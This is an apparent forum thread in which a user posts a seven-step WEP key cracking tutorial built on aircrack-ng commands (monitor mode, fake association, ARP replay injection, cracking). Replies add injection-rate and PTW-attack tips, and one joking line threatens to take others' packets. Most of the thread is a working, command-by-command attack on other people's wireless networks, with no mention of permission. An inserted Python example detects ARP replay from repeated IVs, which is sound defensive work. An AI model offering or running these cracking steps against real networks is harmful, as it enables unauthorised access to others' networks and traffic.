When I do not do things repeatedly I normally forget how to do them. So I typed up the steps I take when cracking WEP.
Wep Cracking Guide
Before attempting to follow this tutorial please update your aircrack to the newest dev version.
1. Put your card into monitor mode and listen on the correct channel
airmon-ng start wlan0 6
start This will put your card into monitor mode.
wlan0 This is your wireless card's name.
6 Is the channel that your target ap broadcasts.
2. Start airodump-ng to capture packets.
airodump-ng wlan0 -c 6 --bssid 00:11:22:33:44:55 -w output
wlan0 Is your wireless card's name
-c 6 Designates which channel airodump should listen for packets on. This should be the same channel as your target ap.
--bssid 00:11:22:33:44:55 Designates the mac address of your target ap.
-w output Is the file where all the packets will be saved and output is the name. The files will appear as output-1.cap output-2.cap etc.
3. Associate with the target ap.
aireplay-ng -1 60 -q 10 wlan0 -e test -a 00:11:22:33:44:44 -h 00:11:22:33:44:55 -o 1
-1 60 Tells the card to fake associate with the target ap and reassociate every 60 seconds.
-q 10 Tells the card to send keep-alive packets every 10 seconds.
wlan0 Is the name of your wireless card's interface.
-e Tells the card which ap to target, if the ap has spaces in it surround it with quotations. ie "test ap"
-a Tells the card the mac address of the ap to target.
-h Tells the card the mac address of the wireless card you are using.
-o 1 Tells the card to send 1 packet at a time.
4. Find your card's maximum bitrate.
aireplay-ng -9 -B wlan0
-9 This tests your card to see if it can inject.
-B performs bitrate test.
wlan0 Is your wireless card's name.
5. Set your card's bitrate so you get the most pps (packets per second)
iwconfig wlan0 rate 54M
wlan0 Is your wireless card's name.
rate 54M Sets your bitrate, 54 is the highest. You want to put the highest number that you successfully got on the bitrate test.
6. Use ARP replay on the target ap to get ivs.
aireplay-ng -3 wlan0 -b 00:11:22:33:44:55 -h 00:11:22:33:44:55 -x 100
-3 Is the standard ARP replay attack.
wlan0 Is your wireless card's name.
-b 00:11:22:33:44:55 The mac address of your target ap.
-h 00:11:22:33:44:55 The mac address of your wireless card.
-x 100 The rate of packet injection. (The higher the better, but some aps will disassociate with you if it is too high)
7. Crack the wep key of your target ap.
aircrack-ng -b 00:11:22:33:44:55 output*.cap
-b 00:11:22:33:44:55 Is the mac of your target ap. (aircrack-ng searches through the airodump files for packets matching this mac)
output*.cap This is the name of the file aircrack-ng will search through for packets. (The * tells aircrack-ng to use any file with the prefix of output)
Thanks to the aircrack-ng dev team for this great program, and darkAudax for all his wonderful entries in the aircrack-ng wiki.
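A defender's view of step 6, as an added example that is not part of the original thread: ARP replay re-sends one captured WEP frame, so the injected copies all carry the same IV from the same transmitter, which a wireless IDS can flag. The frame tuple layout, the thresholds and the sample records below are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

# Assumed thresholds (not from the thread); tune them to your own network.
WINDOW_MS = 1000    # sliding window length in milliseconds
MAX_REPEATS = 50    # tolerated copies of one (transmitter, IV) pair per window


def detect_iv_replay(frames, window_ms=WINDOW_MS, max_repeats=MAX_REPEATS):
    """Return {(bssid, transmitter): peak_repeats} for stations that resend
    a single WEP IV more than max_repeats times within window_ms.

    frames: iterable of (timestamp_ms, bssid, transmitter, iv), sorted by time.
    This tuple layout is hypothetical; map your sensor's output onto it.
    """
    recent = defaultdict(deque)  # (bssid, transmitter, iv) -> timestamps in window
    alerts = {}
    for ts, bssid, tx, iv in frames:
        seen = recent[(bssid, tx, iv)]
        seen.append(ts)
        # Drop sightings that have fallen out of the sliding window.
        while ts - seen[0] > window_ms:
            seen.popleft()
        if len(seen) > max_repeats:
            key = (bssid, tx)
            alerts[key] = max(alerts.get(key, 0), len(seen))
    return alerts


def sample_frames():
    """Constructed capture metadata: one normal client, one replaying station."""
    ap = "00:11:22:33:44:55"
    frames = []
    # Normal client: 20 frames per second, a fresh IV on every frame.
    for i in range(40):
        frames.append((i * 50, ap, "aa:aa:aa:aa:aa:01", i))
    # Replaying station: the same frame (same IV) re-sent 100 times per second.
    for i in range(200):
        frames.append((i * 10, ap, "aa:aa:aa:aa:aa:02", 0x1A2B3C))
    return sorted(frames)


if __name__ == "__main__":
    for (bssid, tx), peak in detect_iv_replay(sample_frames()).items():
        print(f"possible ARP replay on {bssid}: {tx} sent one IV "
              f"{peak} times within {WINDOW_MS} ms")
```

WEP has no replay protection, so the access point accepts every copy; the repeated IV is visible only to a monitoring sensor, not to the AP itself.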
Welcome to the Forum!!
Good start for you with the tut!
step 6 with -x 100, i use -x 1000. my card likes the overdose of packets, once it comes down it gets in a mood.
I normally leave it at however fast my card can get, but when the ap can't handle it and it dissociates I have to reduce the packets some. Btw, thanks for the welcome! :-)
i only associate once, it seems to do the trick. i know what ya mean about different PPS. best results for me is 1000.
step 7, have a look for the new aircrack-ng or aircrack-ptw. you'll get the key faster with less packets.
I have the newest version of aircrack-ng, the dev version. The ptw attack on wep is now default. I crack my weps with 10k-40k ivs. I normally get dissociated with the AP because my pps is so high so I have to make sure my card keeps trying to associate and then lower my pps so my card stays associated.
i know, but i still like using ptw.
now you just use
aircrack-ng to launch ptw attack which is now default
aircrack-ng -K allows the old standard attack....
the -z no longer exists in newer devs...
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
Joseph,
In your initial post (step-by-step guide) you have not used the KISMET.
Is that not needed with your guide? or am I missing something?
Thanks,
i never use kismet for wep cracking....
airodump is enough...really....